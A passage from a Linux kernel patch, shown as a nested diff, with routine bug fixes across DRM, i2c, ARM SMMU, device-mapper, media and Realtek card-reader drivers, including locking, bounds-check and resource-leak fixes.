+ 		cec_notifier_set_phys_addr_from_edid(encoder_hdmi->cec_notifier, edid);
++
++		kfree(edid);
+ 	} else
+ 		cec_notifier_phys_addr_invalidate(encoder_hdmi->cec_notifier);
+ }
+diff --git a/drivers/gpu/drm/tests/drm_mm_test.c b/drivers/gpu/drm/tests/drm_mm_test.c
+index c4b66eeae2039..13fa4a18a11b2 100644
+--- a/drivers/gpu/drm/tests/drm_mm_test.c
++++ b/drivers/gpu/drm/tests/drm_mm_test.c
+@@ -939,7 +939,7 @@ static void drm_test_mm_insert_range(struct kunit *test)
+ 		KUNIT_ASSERT_FALSE(test, __drm_test_mm_insert_range(test, count, size, 0, max - 1));
+ 		KUNIT_ASSERT_FALSE(test, __drm_test_mm_insert_range(test, count, size, 0, max / 2));
+ 		KUNIT_ASSERT_FALSE(test, __drm_test_mm_insert_range(test, count, size,
+-								    max / 2, max / 2));
++								    max / 2, max));
+ 		KUNIT_ASSERT_FALSE(test, __drm_test_mm_insert_range(test, count, size,
+ 								    max / 4 + 1, 3 * max / 4 - 1));
+ 
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index 1fda1eaa6d6ab..da1f6b60f9c9a 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -1754,6 +1754,7 @@ static int i801_probe(struct pci_dev *dev, const struct pci_device_id *id)
+ 		"SMBus I801 adapter at %04lx", priv->smba);
+ 	err = i2c_add_adapter(&priv->adapter);
+ 	if (err) {
++		platform_device_unregister(priv->tco_pdev);
+ 		i801_acpi_remove(priv);
+ 		return err;
+ 	}
+diff --git a/drivers/i2c/busses/i2c-npcm7xx.c b/drivers/i2c/busses/i2c-npcm7xx.c
+index 83457359ec450..767dd15b3c881 100644
+--- a/drivers/i2c/busses/i2c-npcm7xx.c
++++ b/drivers/i2c/busses/i2c-npcm7xx.c
+@@ -696,6 +696,7 @@ static void npcm_i2c_callback(struct npcm_i2c *bus,
+ {
+ 	struct i2c_msg *msgs;
+ 	int msgs_num;
++	bool do_complete = false;
+ 
+ 	msgs = bus->msgs;
+ 	msgs_num = bus->msgs_num;
+@@ -724,23 +725,17 @@ static void npcm_i2c_callback(struct npcm_i2c *bus,
+ 				 msgs[1].flags & I2C_M_RD)
+ 				msgs[1].len = info;
+ 		}
+-		if (completion_done(&bus->cmd_complete) == false)
+-			complete(&bus->cmd_complete);
+-	break;
+-
++		do_complete = true;
++		break;
+ 	case I2C_NACK_IND:
+ 		/* MASTER transmit got a NACK before tx all bytes */
+ 		bus->cmd_err = -ENXIO;
+-		if (bus->master_or_slave == I2C_MASTER)
+-			complete(&bus->cmd_complete);
+-
++		do_complete = true;
+ 		break;
+ 	case I2C_BUS_ERR_IND:
+ 		/* Bus error */
+ 		bus->cmd_err = -EAGAIN;
+-		if (bus->master_or_slave == I2C_MASTER)
+-			complete(&bus->cmd_complete);
+-
++		do_complete = true;
+ 		break;
+ 	case I2C_WAKE_UP_IND:
+ 		/* I2C wake up */
+@@ -754,6 +749,8 @@ static void npcm_i2c_callback(struct npcm_i2c *bus,
+ 	if (bus->slave)
+ 		bus->master_or_slave = I2C_SLAVE;
+ #endif
++	if (do_complete)
++		complete(&bus->cmd_complete);
+ }
+ 
+ static u8 npcm_i2c_fifo_usage(struct npcm_i2c *bus)
+diff --git a/drivers/i2c/busses/i2c-xiic.c b/drivers/i2c/busses/i2c-xiic.c
+index b41a6709e47f2..b27bfc7765993 100644
+--- a/drivers/i2c/busses/i2c-xiic.c
++++ b/drivers/i2c/busses/i2c-xiic.c
+@@ -420,7 +420,7 @@ static irqreturn_t xiic_process(int irq, void *dev_id)
+ 		 * reset the IP instead of just flush fifos
+ 		 */
+ 		ret = xiic_reinit(i2c);
+-		if (!ret)
++		if (ret < 0)
+ 			dev_dbg(i2c->adap.dev.parent, "reinit failed\n");
+ 
+ 		if (i2c->rx_msg) {
+diff --git a/drivers/i2c/muxes/i2c-demux-pinctrl.c b/drivers/i2c/muxes/i2c-demux-pinctrl.c
+index f7a7405d4350a..8e8688e8de0fb 100644
+--- a/drivers/i2c/muxes/i2c-demux-pinctrl.c
++++ b/drivers/i2c/muxes/i2c-demux-pinctrl.c
+@@ -243,6 +243,10 @@ static int i2c_demux_pinctrl_probe(struct platform_device *pdev)
+ 
+ 		props[i].name = devm_kstrdup(&pdev->dev, "status", GFP_KERNEL);
+ 		props[i].value = devm_kstrdup(&pdev->dev, "ok", GFP_KERNEL);
++		if (!props[i].name || !props[i].value) {
++			err = -ENOMEM;
++			goto err_rollback;
++		}
+ 		props[i].length = 3;
+ 
+ 		of_changeset_init(&priv->chan[i].chgset);
+diff --git a/drivers/i2c/muxes/i2c-mux-gpio.c b/drivers/i2c/muxes/i2c-mux-gpio.c
+index 73a23e117ebec..0930a51c8c7c0 100644
+--- a/drivers/i2c/muxes/i2c-mux-gpio.c
++++ b/drivers/i2c/muxes/i2c-mux-gpio.c
+@@ -105,8 +105,10 @@ static int i2c_mux_gpio_probe_fw(struct gpiomux *mux,
+ 
+ 		} else if (is_acpi_node(child)) {
+ 			rc = acpi_get_local_address(ACPI_HANDLE_FWNODE(child), values + i);
+-			if (rc)
++			if (rc) {
++				fwnode_handle_put(child);
+ 				return dev_err_probe(dev, rc, "Cannot get address\n");
++			}
+ 		}
+ 
+ 		i++;
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3-sva.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3-sva.c
+index 5968a568aae2a..ffba8ce93ff88 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3-sva.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3-sva.c
+@@ -186,6 +186,15 @@ static void arm_smmu_free_shared_cd(struct arm_smmu_ctx_desc *cd)
+ 	}
+ }
+ 
++/*
++ * Cloned from the MAX_TLBI_OPS in arch/arm64/include/asm/tlbflush.h, this
++ * is used as a threshold to replace per-page TLBI commands to issue in the
++ * command queue with an address-space TLBI command, when SMMU w/o a range
++ * invalidation feature handles too many per-page TLBI commands, which will
++ * otherwise result in a soft lockup.
++ */
++#define CMDQ_MAX_TLBI_OPS		(1 << (PAGE_SHIFT - 3))
++
+ static void arm_smmu_mm_invalidate_range(struct mmu_notifier *mn,
+ 					 struct mm_struct *mm,
+ 					 unsigned long start, unsigned long end)
+@@ -200,10 +209,22 @@ static void arm_smmu_mm_invalidate_range(struct mmu_notifier *mn,
+ 	 * range. So do a simple translation here by calculating size correctly.
+ 	 */
+ 	size = end - start;
++	if (!(smmu_domain->smmu->features & ARM_SMMU_FEAT_RANGE_INV)) {
++		if (size >= CMDQ_MAX_TLBI_OPS * PAGE_SIZE)
++			size = 0;
++	}
++
++	if (!(smmu_domain->smmu->features & ARM_SMMU_FEAT_BTM)) {
++		if (!size)
++			arm_smmu_tlb_inv_asid(smmu_domain->smmu,
++					      smmu_mn->cd->asid);
++		else
++			arm_smmu_tlb_inv_range_asid(start, size,
++						    smmu_mn->cd->asid,
++						    PAGE_SIZE, false,
++						    smmu_domain);
++	}
+ 
+-	if (!(smmu_domain->smmu->features & ARM_SMMU_FEAT_BTM))
+-		arm_smmu_tlb_inv_range_asid(start, size, smmu_mn->cd->asid,
+-					    PAGE_SIZE, false, smmu_domain);
+ 	arm_smmu_atc_inv_domain(smmu_domain, mm->pasid, start, size);
+ }
+ 
+diff --git a/drivers/md/dm-core.h b/drivers/md/dm-core.h
+index 28c641352de9b..71dcd8fd4050a 100644
+--- a/drivers/md/dm-core.h
++++ b/drivers/md/dm-core.h
+@@ -214,6 +214,7 @@ struct dm_table {
+ 
+ 	/* a list of devices used by this table */
+ 	struct list_head devices;
++	struct rw_semaphore devices_lock;
+ 
+ 	/* events get handed up using this callback */
+ 	void (*event_fn)(void *);
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 2afd2d2a0f407..206e6ce554dc7 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1566,6 +1566,8 @@ static void retrieve_deps(struct dm_table *table,
+ 	struct dm_dev_internal *dd;
+ 	struct dm_target_deps *deps;
+ 
++	down_read(&table->devices_lock);
++
+ 	deps = get_result_buffer(param, param_size, &len);
+ 
+ 	/*
+@@ -1580,7 +1582,7 @@ static void retrieve_deps(struct dm_table *table,
+ 	needed = struct_size(deps, dev, count);
+ 	if (len < needed) {
+ 		param->flags |= DM_BUFFER_FULL_FLAG;
+-		return;
++		goto out;
+ 	}
+ 
+ 	/*
+@@ -1592,6 +1594,9 @@ static void retrieve_deps(struct dm_table *table,
+ 		deps->dev[count++] = huge_encode_dev(dd->dm_dev->bdev->bd_dev);
+ 
+ 	param->data_size = param->data_start + needed;
++
++out:
++	up_read(&table->devices_lock);
+ }
+ 
+ static int table_deps(struct file *filp, struct dm_ioctl *param, size_t param_size)
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 288f600ee56dc..dac6a5f25f2be 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -134,6 +134,7 @@ int dm_table_create(struct dm_table **result, fmode_t mode,
+ 		return -ENOMEM;
+ 
+ 	INIT_LIST_HEAD(&t->devices);
++	init_rwsem(&t->devices_lock);
+ 
+ 	if (!num_targets)
+ 		num_targets = KEYS_PER_NODE;
+@@ -362,15 +363,19 @@ int dm_get_device(struct dm_target *ti, const char *path, fmode_t mode,
+ 			return -ENODEV;
+ 	}
+ 
++	down_write(&t->devices_lock);
++
+ 	dd = find_device(&t->devices, dev);
+ 	if (!dd) {
+ 		dd = kmalloc(sizeof(*dd), GFP_KERNEL);
+-		if (!dd)
+-			return -ENOMEM;
++		if (!dd) {
++			r = -ENOMEM;
++			goto unlock_ret_r;
++		}
+ 
+ 		if ((r = dm_get_table_device(t->md, dev, mode, &dd->dm_dev))) {
+ 			kfree(dd);
+-			return r;
++			goto unlock_ret_r;
+ 		}
+ 
+ 		refcount_set(&dd->count, 1);
+@@ -380,12 +385,17 @@ int dm_get_device(struct dm_target *ti, const char *path, fmode_t mode,
+ 	} else if (dd->dm_dev->mode != (mode | dd->dm_dev->mode)) {
+ 		r = upgrade_mode(dd, mode, t->md);
+ 		if (r)
+-			return r;
++			goto unlock_ret_r;
+ 	}
+ 	refcount_inc(&dd->count);
+ out:
++	up_write(&t->devices_lock);
+ 	*result = dd->dm_dev;
+ 	return 0;
++
++unlock_ret_r:
++	up_write(&t->devices_lock);
++	return r;
+ }
+ EXPORT_SYMBOL(dm_get_device);
+ 
+@@ -421,9 +431,12 @@ static int dm_set_device_limits(struct dm_target *ti, struct dm_dev *dev,
+ void dm_put_device(struct dm_target *ti, struct dm_dev *d)
+ {
+ 	int found = 0;
+-	struct list_head *devices = &ti->table->devices;
++	struct dm_table *t = ti->table;
++	struct list_head *devices = &t->devices;
+ 	struct dm_dev_internal *dd;
+ 
++	down_write(&t->devices_lock);
++
+ 	list_for_each_entry(dd, devices, list) {
+ 		if (dd->dm_dev == d) {
+ 			found = 1;
+@@ -432,14 +445,17 @@ void dm_put_device(struct dm_target *ti, struct dm_dev *d)
+ 	}
+ 	if (!found) {
+ 		DMERR("%s: device %s not in table devices list",
+-		      dm_device_name(ti->table->md), d->name);
+-		return;
++		      dm_device_name(t->md), d->name);
++		goto unlock_ret;
+ 	}
+ 	if (refcount_dec_and_test(&dd->count)) {
+-		dm_put_table_device(ti->table->md, d);
++		dm_put_table_device(t->md, d);
+ 		list_del(&dd->list);
+ 		kfree(dd);
+ 	}
++
++unlock_ret:
++	up_write(&t->devices_lock);
+ }
+ EXPORT_SYMBOL(dm_put_device);
+ 
+diff --git a/drivers/media/common/videobuf2/frame_vector.c b/drivers/media/common/videobuf2/frame_vector.c
+index 144027035892a..07ebe4424df3a 100644
+--- a/drivers/media/common/videobuf2/frame_vector.c
++++ b/drivers/media/common/videobuf2/frame_vector.c
+@@ -30,6 +30,10 @@
+  * different type underlying the specified range of virtual addresses.
+  * When the function isn't able to map a single page, it returns error.
+  *
++ * Note that get_vaddr_frames() cannot follow VM_IO mappings. It used
++ * to be able to do that, but that could (racily) return non-refcounted
++ * pfns.
++ *
+  * This function takes care of grabbing mmap_lock as necessary.
+  */
+ int get_vaddr_frames(unsigned long start, unsigned int nr_frames,
+@@ -55,8 +59,6 @@ int get_vaddr_frames(unsigned long start, unsigned int nr_frames,
+ 	if (likely(ret > 0))
+ 		return ret;
+ 
+-	/* This used to (racily) return non-refcounted pfns. Let people know */
+-	WARN_ONCE(1, "get_vaddr_frames() cannot follow VM_IO mapping");
+ 	vec->nr_frames = 0;
+ 	return ret ? ret : -EFAULT;
+ }
+diff --git a/drivers/media/platform/marvell/Kconfig b/drivers/media/platform/marvell/Kconfig
+index ec1a16734a280..d6499ffe30e8b 100644
+--- a/drivers/media/platform/marvell/Kconfig
++++ b/drivers/media/platform/marvell/Kconfig
+@@ -7,7 +7,7 @@ config VIDEO_CAFE_CCIC
+ 	depends on V4L_PLATFORM_DRIVERS
+ 	depends on PCI && I2C && VIDEO_DEV
+ 	depends on COMMON_CLK
+-	select VIDEO_OV7670
++	select VIDEO_OV7670 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
+ 	select VIDEOBUF2_VMALLOC
+ 	select VIDEOBUF2_DMA_CONTIG
+ 	select VIDEOBUF2_DMA_SG
+@@ -22,7 +22,7 @@ config VIDEO_MMP_CAMERA
+ 	depends on I2C && VIDEO_DEV
+ 	depends on ARCH_MMP || COMPILE_TEST
+ 	depends on COMMON_CLK
+-	select VIDEO_OV7670
++	select VIDEO_OV7670 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
+ 	select I2C_GPIO
+ 	select VIDEOBUF2_VMALLOC
+ 	select VIDEOBUF2_DMA_CONTIG
+diff --git a/drivers/media/platform/via/Kconfig b/drivers/media/platform/via/Kconfig
+index 8926eb0803b27..6e603c0382487 100644
+--- a/drivers/media/platform/via/Kconfig
++++ b/drivers/media/platform/via/Kconfig
+@@ -7,7 +7,7 @@ config VIDEO_VIA_CAMERA
+ 	depends on V4L_PLATFORM_DRIVERS
+ 	depends on FB_VIA && VIDEO_DEV
+ 	select VIDEOBUF2_DMA_SG
+-	select VIDEO_OV7670
++	select VIDEO_OV7670 if VIDEO_CAMERA_SENSOR
+ 	help
+ 	   Driver support for the integrated camera controller in VIA
+ 	   Chrome9 chipsets.  Currently only tested on OLPC xo-1.5 systems
+diff --git a/drivers/media/usb/em28xx/Kconfig b/drivers/media/usb/em28xx/Kconfig
+index b3c472b8c5a96..cb61fd6cc6c61 100644
+--- a/drivers/media/usb/em28xx/Kconfig
++++ b/drivers/media/usb/em28xx/Kconfig
+@@ -12,8 +12,8 @@ config VIDEO_EM28XX_V4L2
+ 	select VIDEO_SAA711X if MEDIA_SUBDRV_AUTOSELECT
+ 	select VIDEO_TVP5150 if MEDIA_SUBDRV_AUTOSELECT
+ 	select VIDEO_MSP3400 if MEDIA_SUBDRV_AUTOSELECT
+-	select VIDEO_MT9V011 if MEDIA_SUBDRV_AUTOSELECT && MEDIA_CAMERA_SUPPORT
+-	select VIDEO_OV2640 if MEDIA_SUBDRV_AUTOSELECT && MEDIA_CAMERA_SUPPORT
++	select VIDEO_MT9V011 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
++	select VIDEO_OV2640 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
+ 	help
+ 	  This is a video4linux driver for Empia 28xx based TV cards.
+ 
+diff --git a/drivers/media/usb/go7007/Kconfig b/drivers/media/usb/go7007/Kconfig
+index 4ff79940ad8d4..b2a15d9fb1f33 100644
+--- a/drivers/media/usb/go7007/Kconfig
++++ b/drivers/media/usb/go7007/Kconfig
+@@ -12,8 +12,8 @@ config VIDEO_GO7007
+ 	select VIDEO_TW2804 if MEDIA_SUBDRV_AUTOSELECT
+ 	select VIDEO_TW9903 if MEDIA_SUBDRV_AUTOSELECT
+ 	select VIDEO_TW9906 if MEDIA_SUBDRV_AUTOSELECT
+-	select VIDEO_OV7640 if MEDIA_SUBDRV_AUTOSELECT && MEDIA_CAMERA_SUPPORT
+ 	select VIDEO_UDA1342 if MEDIA_SUBDRV_AUTOSELECT
++	select VIDEO_OV7640 if MEDIA_SUBDRV_AUTOSELECT && VIDEO_CAMERA_SENSOR
+ 	help
+ 	  This is a video4linux driver for the WIS GO7007 MPEG
+ 	  encoder chip.
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index 067b43a1cb3eb..6d7535efc09de 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -1347,6 +1347,9 @@ int uvc_query_v4l2_menu(struct uvc_video_chain *chain,
+ 	query_menu->id = id;
+ 	query_menu->index = index;
+ 
++	if (index >= BITS_PER_TYPE(mapping->menu_mask))
++		return -EINVAL;
++
+ 	ret = mutex_lock_interruptible(&chain->ctrl_mutex);
+ 	if (ret < 0)
+ 		return -ERESTARTSYS;
+diff --git a/drivers/misc/cardreader/rts5227.c b/drivers/misc/cardreader/rts5227.c
+index 3dae5e3a16976..cd512284bfb39 100644
+--- a/drivers/misc/cardreader/rts5227.c
++++ b/drivers/misc/cardreader/rts5227.c
+@@ -83,63 +83,20 @@ static void rts5227_fetch_vendor_settings(struct rtsx_pcr *pcr)
+ 
+ static void rts5227_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+-	u32 lval;
+ 	struct rtsx_cr_option *option = &pcr->option;
+ 
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+-
+ 	if (CHK_PCI_PID(pcr, 0x522A)) {
+-		if (0 == (lval & 0x0F))
+-			rtsx_pci_enable_oobs_polling(pcr);
+-		else
++		if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
++				| PM_L1_1_EN | PM_L1_2_EN))
+ 			rtsx_pci_disable_oobs_polling(pcr);
++		else
++			rtsx_pci_enable_oobs_polling(pcr);
+ 	}
+ 
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_2_EN);
+-
+ 	if (option->ltr_en) {
+-		u16 val;
+-
+-		pcie_capability_read_word(pcr->pci, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+-
+ }
+ 
+ static int rts5227_extra_init_hw(struct rtsx_pcr *pcr)
+@@ -195,7 +152,7 @@ static int rts5227_extra_init_hw(struct rtsx_pcr *pcr)
+ 		}
+ 	}
+ 
+-	if (option->force_clkreq_0 && pcr->aspm_mode == ASPM_MODE_CFG)
++	if (option->force_clkreq_0)
+ 		rtsx_pci_add_cmd(pcr, WRITE_REG_CMD, PETXCFG,
+ 				FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+ 	else
+diff --git a/drivers/misc/cardreader/rts5228.c b/drivers/misc/cardreader/rts5228.c
+index f4ab09439da70..0c7f10bcf6f12 100644
+--- a/drivers/misc/cardreader/rts5228.c
++++ b/drivers/misc/cardreader/rts5228.c
+@@ -386,59 +386,25 @@ static void rts5228_process_ocp(struct rtsx_pcr *pcr)
+ 
+ static void rts5228_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+-	u32 lval;
+ 	struct rtsx_cr_option *option = &pcr->option;
+ 
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+-
+-	if (0 == (lval & 0x0F))
+-		rtsx_pci_enable_oobs_polling(pcr);
+-	else
++	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
++				| PM_L1_1_EN | PM_L1_2_EN))
+ 		rtsx_pci_disable_oobs_polling(pcr);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+ 	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+-	else
+-		rtsx_clear_dev_flag(pcr, PM_L1_2_EN);
++		rtsx_pci_enable_oobs_polling(pcr);
+ 
+ 	rtsx_pci_write_register(pcr, ASPM_FORCE_CTL, 0xFF, 0);
+-	if (option->ltr_en) {
+-		u16 val;
+ 
+-		pcie_capability_read_word(pcr->pci, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++	if (option->ltr_en) {
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+ }
+ 
+ static int rts5228_extra_init_hw(struct rtsx_pcr *pcr)
+ {
++	struct rtsx_cr_option *option = &pcr->option;
+ 
+ 	rtsx_pci_write_register(pcr, RTS5228_AUTOLOAD_CFG1,
+ 			CD_RESUME_EN_MASK, CD_RESUME_EN_MASK);
+@@ -469,6 +435,17 @@ static int rts5228_extra_init_hw(struct rtsx_pcr *pcr)
+ 	else
+ 		rtsx_pci_write_register(pcr, PETXCFG, 0x30, 0x00);
+ 
++	/*
++	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
++	 * to drive low, and we forcibly request clock.
++	 */
++	if (option->force_clkreq_0)
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
++	else
++		rtsx_pci_write_register(pcr, PETXCFG,
++				 FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_HIGH);
++
+ 	rtsx_pci_write_register(pcr, PWD_SUSPEND_EN, 0xFF, 0xFB);
+ 
+ 	if (pcr->rtd3_en) {
+diff --git a/drivers/misc/cardreader/rts5249.c b/drivers/misc/cardreader/rts5249.c
+index 47ab72a43256b..6c81040e18bef 100644
+--- a/drivers/misc/cardreader/rts5249.c
++++ b/drivers/misc/cardreader/rts5249.c
+@@ -86,64 +86,22 @@ static void rtsx_base_fetch_vendor_settings(struct rtsx_pcr *pcr)
+ 
+ static void rts5249_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+ 	struct rtsx_cr_option *option = &(pcr->option);
+-	u32 lval;
+-
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+ 
+ 	if (CHK_PCI_PID(pcr, PID_524A) || CHK_PCI_PID(pcr, PID_525A)) {
+-		if (0 == (lval & 0x0F))
+-			rtsx_pci_enable_oobs_polling(pcr);
+-		else
++		if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
++				| PM_L1_1_EN | PM_L1_2_EN))
+ 			rtsx_pci_disable_oobs_polling(pcr);
++		else
++			rtsx_pci_enable_oobs_polling(pcr);
+ 	}
+ 
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+-
+ 	if (option->ltr_en) {
+-		u16 val;
+-
+-		pcie_capability_read_word(pdev, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+ }
+ 
+-static int rts5249_init_from_hw(struct rtsx_pcr *pcr)
+-{
+-	struct rtsx_cr_option *option = &(pcr->option);
+-
+-	if (rtsx_check_dev_flag(pcr, ASPM_L1_1_EN | ASPM_L1_2_EN
+-				| PM_L1_1_EN | PM_L1_2_EN))
+-		option->force_clkreq_0 = false;
+-	else
+-		option->force_clkreq_0 = true;
+-
+-	return 0;
+-}
+-
+ static void rts52xa_force_power_down(struct rtsx_pcr *pcr, u8 pm_state, bool runtime)
+ {
+ 	/* Set relink_time to 0 */
+@@ -276,7 +234,6 @@ static int rts5249_extra_init_hw(struct rtsx_pcr *pcr)
+ 	struct rtsx_cr_option *option = &(pcr->option);
+ 
+ 	rts5249_init_from_cfg(pcr);
+-	rts5249_init_from_hw(pcr);
+ 
+ 	rtsx_pci_init_cmd(pcr);
+ 
+@@ -327,11 +284,12 @@ static int rts5249_extra_init_hw(struct rtsx_pcr *pcr)
+ 		}
+ 	}
+ 
++
+ 	/*
+ 	 * If u_force_clkreq_0 is enabled, CLKREQ# PIN will be forced
+ 	 * to drive low, and we forcibly request clock.
+ 	 */
+-	if (option->force_clkreq_0 && pcr->aspm_mode == ASPM_MODE_CFG)
++	if (option->force_clkreq_0)
+ 		rtsx_pci_write_register(pcr, PETXCFG,
+ 			FORCE_CLKREQ_DELINK_MASK, FORCE_CLKREQ_LOW);
+ 	else
+diff --git a/drivers/misc/cardreader/rts5260.c b/drivers/misc/cardreader/rts5260.c
+index 79b18f6f73a8a..d2d3a6ccb8f7d 100644
+--- a/drivers/misc/cardreader/rts5260.c
++++ b/drivers/misc/cardreader/rts5260.c
+@@ -480,47 +480,19 @@ static void rts5260_pwr_saving_setting(struct rtsx_pcr *pcr)
+ 
+ static void rts5260_init_from_cfg(struct rtsx_pcr *pcr)
+ {
+-	struct pci_dev *pdev = pcr->pci;
+-	int l1ss;
+ 	struct rtsx_cr_option *option = &pcr->option;
+-	u32 lval;
+-
+-	l1ss = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_L1SS);
+-	if (!l1ss)
+-		return;
+-
+-	pci_read_config_dword(pdev, l1ss + PCI_L1SS_CTL1, &lval);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_1)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_ASPM_L1_2)
+-		rtsx_set_dev_flag(pcr, ASPM_L1_2_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_1)
+-		rtsx_set_dev_flag(pcr, PM_L1_1_EN);
+-
+-	if (lval & PCI_L1SS_CTL1_PCIPM_L1_2)
+-		rtsx_set_dev_flag(pcr, PM_L1_2_EN);
+ 
+ 	rts5260_pwr_saving_setting(pcr);
+ 
+ 	if (option->ltr_en) {
+-		u16 val;
+-
+-		pcie_capability_read_word(pdev, PCI_EXP_DEVCTL2, &val);
+-		if (val & PCI_EXP_DEVCTL2_LTR_EN) {
+-			option->ltr_enabled = true;
+-			option->ltr_active = true;
++		if (option->ltr_enabled)
+ 			rtsx_set_ltr_latency(pcr, option->ltr_active_latency);
+-		} else {
+-			option->ltr_enabled = false;
+-		}
+ 	}
+ }
+ 
+ static int rts5260_extra_init_hw(struct rtsx_pcr *pcr)
+ {
++	struct rtsx_cr_option *option = &pcr->option;
+ 
+ 	/* Set mcu_cnt to 7 to ensure data can be sampled properly */
